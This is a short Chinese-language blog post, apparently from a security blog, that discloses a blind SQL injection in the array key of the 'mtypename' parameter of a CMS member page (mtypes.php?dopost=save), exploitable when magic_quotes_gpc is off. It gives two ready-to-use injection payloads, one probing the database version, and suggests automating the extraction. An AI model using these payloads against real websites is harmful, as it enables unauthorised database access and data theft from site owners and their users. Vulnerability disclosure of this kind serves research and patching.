漏洞描述:

需要magic_quotes_gpc = Off,所以说是鸡肋啊.

发生在数组key里的注射漏洞,有点意思.

这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下

https://www.webshell.cc/member/mtypes.php?dopost=save

exploit:

mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4172.html